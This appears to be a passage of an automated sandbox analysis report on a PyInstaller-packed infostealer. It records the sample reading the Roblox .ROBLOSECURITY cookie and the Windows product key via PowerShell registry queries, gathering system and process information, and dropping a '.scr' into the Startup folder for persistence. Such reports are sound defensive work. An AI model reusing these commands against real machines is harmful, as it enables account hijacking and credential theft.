              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: program.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: program.exeStatic file information: File size 7954796 > 1048576
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: program.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: program.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: \t5.pdbj source: powershell.exe, 0000002A.00000002.1989050806.000001E9C9F48000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000001.00000002.2116621230.00007FFDFAF07000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: program.exe, 00000000.00000003.1704155388.000002641A640000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2123042345.00007FFE1A464000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: program.exe, 00000001.00000002.2117447704.00007FFDFB2D2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120062918.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: program.exe, program.exe, 00000001.00000002.2117447704.00007FFDFB36A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2018718674.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000053.00000000.2004144713.00007FF64FEC0000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.pdb source: powershell.exe, 0000002A.00000002.1908908412.000001E9B2165000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: program.exe, 00000001.00000002.2122070037.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: program.exe, 00000001.00000002.2121630063.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: program.exe, 00000001.00000002.2121042650.00007FFE11EA1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: program.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: program.exe, 00000001.00000002.2121890288.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: program.exe, 00000001.00000002.2120841650.00007FFE1151B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: program.exe, 00000001.00000002.2122536379.00007FFE13301000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: program.exe, 00000001.00000002.2122251570.00007FFE13201000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: program.exe, program.exe, 00000001.00000002.2120647097.00007FFE0EB41000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: program.exe, 00000001.00000002.2118655051.00007FFDFB868000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: program.exe, program.exe, 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: program.exe, program.exe, 00000001.00000002.2120375422.00007FFE0E15E000.00000040.00000001.01000000.0000000E.sdmp
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: program.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAF10350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF10350
              Source: program.exeStatic PE information: real checksum: 0x7a2451 should be: 0x7a28dd
              Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb64b
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f35a
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x46d69
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdba7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17cae
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa8f8a
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11959
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a226
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1fcc8
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdd74
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x7797
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x21293
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15eca
              Source: tgmup5d5.dll.58.drStatic PE information: real checksum: 0x0 should be: 0x10a05
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAE6AC25 push rcx; ret 1_2_00007FFDFAE6AC62
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE00784331 push rcx; ret 1_2_00007FFE00784332
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE013427AE push rsp; iretd 1_2_00007FFE013427B9
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE0134267D push rbx; retf 1_2_00007FFE01342685
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A3CD2A5 pushad ; iretd 8_2_00007FFD9A3CD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4E861D push ebx; ret 8_2_00007FFD9A4E863A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4E863D push ebx; ret 8_2_00007FFD9A4E867A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9A4EADE7 push esp; retf 8_2_00007FFD9A4EADE8
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\libffi-8.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\libssl-3.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_ssl.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\sqlite3.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\python313.dll
              Source: C:\Users\user\Desktop\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd
              Source: C:\Users\user\Desktop\program.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7505830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6B7505830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
